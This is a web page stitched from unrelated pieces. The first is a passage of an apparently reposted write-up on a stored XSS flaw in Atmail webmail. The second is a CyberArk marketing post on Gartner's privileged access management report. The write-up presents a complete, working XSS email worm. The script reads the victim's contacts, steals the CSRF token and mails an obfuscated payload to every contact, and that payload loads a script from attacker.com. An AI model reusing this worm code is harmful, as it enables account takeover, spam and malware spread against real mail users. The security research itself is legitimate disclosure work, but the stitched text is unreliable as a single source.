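// Filter pipeline: parse, allowlist by name, re-emit with the chosen serializer.
function filterImgAttrs(tagBody, serialize) {
  return serialize(keepAllowed(tokenizeAttributes(tagBody)));
}

// The article's payload, as the attribute section of its <img> tag.
const ARTICLE_PAYLOAD = ` longdesc="src='x'onerror=alert(document.domain);//><img "src='showme'`;

// Constructed variant in the same class: the whole onerror handler sits inside
// the double-quoted longdesc value, so the allowlist sees only longdesc and src.
const VARIANT_PAYLOAD = ` longdesc="x' onerror='alert(1)' src='y" src='z'`;

// Attribute names a browser would see after each filter design.
function namesAfterFilter(tagBody, serialize) {
  return Object.keys(browserView(filterImgAttrs(tagBody, serialize)));
}
```

Run `namesAfterFilter(VARIANT_PAYLOAD, naiveSerialize)` and the browser-side view contains onerror even though `keepAllowed` never saw such an attribute; with `safeSerialize` only longdesc and src survive. The lesson for a filter author is to serialize from the parsed representation with context-appropriate escaping, never to apply character substitutions to strings that have already been parsed.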

Building the Worm

Once I had a working XSS vector, the next step was to create a payload to spread my email worm. I wrote a piece of JavaScript that does three things:

1. Retrieve the victim's contact list;

2. Extract a valid CSRF token from Atmail;

3. Send the malicious email to every contact in the victim's list.

The code is roughly as follows; the XSS payload is supplied URL-encoded:

// HTTP request to grab the victim's contacts (same-origin, so the session cookie goes along)
var xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET', '/index.php/mail/contacts/viewcontacts/GroupID/0', false);
xmlHttp.send(null);
var response = xmlHttp.responseText;

// Extract email addresses and filter duplicates
var extractedemails = response.match(/[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}/igm) || [];
var uniqueemails = [];
for (var i = 0; i < extractedemails.length; i++) {
    if (uniqueemails.indexOf(extractedemails[i]) == -1) uniqueemails.push(extractedemails[i]);
}

// HTTP request to get the CSRF token; it is readable from the page markup because we run in Atmail's origin
xmlHttp.open('GET', '/index.php/mail/contacts', false);
xmlHttp.send(null);
var response2 = xmlHttp.responseText;
var csrftoken = response2.match(/name="atmailCSRF"\s+value="(.+?)"/im);

// Loop through contacts and send the email; emailBodyHtml carries the URL-encoded XSS payload
for (var j = 0; j < uniqueemails.length; j++) {
    xmlHttp.open('POST', '/index.php/mail/composemessage/send', false);
    var params = 'atmailCSRF=' + csrftoken[1] + '&emailTo=' + encodeURIComponent(uniqueemails[j]) + '&emailSubject=open%20me&emailBodyHtml=%3c%68%33%3e%61%74%6d%61%69%6c%20%65%6d%61%69%6c%20%58%53%53%20%77%6f%72%6d%3c%2f%68%33%3e%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0a%3c%69%6d%67%20%6c%6f%6e%67%64%65%73%63%3d%22%73%72%63%3d%27%78%27%6f%6e%65%72%72%6f%72%3d%65%76%61%6c%28%77%69%6e%64%6f%77%2e%61%74%6f%62%28%27%61%57%35%6a%62%48%56%6b%5a%54%31%6b%62%32%4e%31%62%57%56%75%64%43%35%6a%63%6d%56%68%64%47%56%46%62%47%56%74%5a%57%35%30%4b%43%64%7a%59%33%4a%70%63%48%51%6e%4b%54%74%70%62%6d%4e%73%64%57%52%6c%4c%6e%4e%79%59%7a%30%6e%61%48%52%30%63%48%4d%36%4c%79%39%68%64%48%52%68%59%32%74%6c%63%69%35%6a%62%32%30%76%59%58%52%74%59%57%6c%73%4c%6d%70%7a%4a%7a%74%6b%62%32%4e%31%62%57%56%75%64%43%35%6f%5a%57%46%6b%4c%6d%46%77%63%47%56%75%5a%45%4e%6f%61%57%78%6b%4b%47%6c%75%59%32%78%31%5a%47%55%70%4f%77%3d%3d%27%29%29%3b%2f%2f%3e%3c%69%6d%67%20%22%20%73%72%63%3d%27%73%68%6f%77%6d%65%27%3e';
    xmlHttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xmlHttp.send(params);
}

First, I tried Base64-encoding the XSS payload and embedding it in the onerror event. The handler then uses eval(atob()) to decode and execute the payload:

<img longdesc=" xss/src='x'onerror=eval(window.atob('eGg9bmV3IFhNTEh0dHBS…omitted for brevity…'));//><img " src='showme'>

However, I found that Atmail truncated my Base64-encoded string to 945 characters, which was too short. So I decided to host the payload at an external address and rewrote my XSS payload:

onerror="include=document.createElement('script');include.src='https://attacker.com/atmail.js';document.head.appendChild(include);"

This payload creates a new <script> tag in the page's <head> element that loads my externally hosted malicious JavaScript. It was Base64-encoded as well: the atob() argument inside the onerror handler in the emailBodyHtml parameter above is the Base64 form of exactly this code:

onerror="include=document.createElement('script');include.src='https://attacker.com/atmail.js';document.head.appendChild(include);"

The following video demonstrates how the worm works:

Summary

An XSS worm on Atmail is very useful to scammers and other malicious attackers: it lets them take over victims' accounts and send arbitrary messages to everyone in the victims' address books, which makes the technique well suited to spam, malware distribution and phishing.

References

https://www.bishopfox.com/news/2017/06/atmail-7-stored-xss-vulnerability/

Reference code (the test <img> tag with every attribute set, used to see which attributes survive the filter):

<img src="x" align="left" alt="test" border="1px" crossorigin="anonymous" height="100px" hspace="100px" ismap longdesc="test" sizes="(min-width: 600px) 200px, 50vw" srcset="test.png 2x" usemap="#test" vspace="100px" width="100px">

* Source: bishopfox, compiled by FB editor Alpha_h4ck. Please credit CodeSec.Net when reposting.

Report: Pioneering Privileged Access Management

Gartner has released the first-ever Magic Quadrant for Privileged Access Management*, which is, in our view, a significant milestone for the industry. We believe it spotlights the critical importance of protecting privileged credentials amid digital transformation initiatives and an ever-changing threat landscape.

So why the heightened interest in privileged access? The simple answer: disruption starts with privileged access.

The birth of an industry

The concept of ‘privilege’ started simply enough. Privileged access originally referred to the accounts that IT and systems administrators used to maintain networks and systems. These accounts were primarily shared accounts and gave the user all-powerful access to data and information systems on a network. Whoever controlled these accounts controlled the network.

Regulators understood that privileged accounts gave too much power to individual users over networks and data to not be accounted for. Corporate accountability would require an audit trail of who had access to privileged accounts, how they were being used and what they provided access to.

The introduction of the Sarbanes-Oxley Act (SOX) marked one of the first times that securing privileged accounts became critical to achieving compliance, and regulations like HIPAA and PCI quickly followed suit.

As the pioneer and a market leader, CyberArk has guided the evolution of privileged access management. CyberArk was the first software vendor to make it easy for organizations to identify, control and audit access to privileged accounts as part of their compliance programs.

Abused privileged access in the spotlight

One of the first major incidents that demonstrated the power of privileged access happened in the summer of 2008, when the city of San Francisco lost control over its FiberWAN network. Terry Childs, the city’s systems administrator, locked access to the network by resetting administrative passwords to its switches and routers.

This event was a high-profile example of the threat of privileged insiders, and begged the question what would happen if an outside attacker gained this level of control over a network?

The ensuing years gave us an answer. From Edward Snowden, to Yahoo! and the U.S. Office of Personnel Management, to the Bangladesh Bank and Uber breaches, the common denominator was that attackers exploited the access typically granted to a powerful insider and used it to launch and execute their attacks.

Privileged access management as we know it today

Today, privileged credentials exist everywhere. The adoption of cloud, DevOps, robotic process automation and more has dramatically expanded the threat landscape. Attackers know this as well, which is why nearly 100% of all advanced attacks today rely on the exploitation of privileged credentials to reach a target’s most sensitive data, applications and infrastructure.

This is also why privileged account management is now recognized by Gartner as the number one security project for CISOs out of the company’s top security projects for 2018. **

CyberArk leads the market with its focus on simplicity, automation and risk reduction, delivering the most complete solution on the market to protect against external attackers and malicious insiders exploiting privileged credentials and secrets anywhere they exist including across on-premises, hybrid cloud and DevOps environments, and on the endpoint.

To download a complimentary copy of the Gartner Magic Quadrant for Privileged Access Management, go here (registration required) .

* Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018

** Gartner, Smarter with Gartner, Gartner Top 10 Security Projects for 2018, June 6, 2018

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Download CyberArk’s infographic “The Evolution of Privileged Access” below:

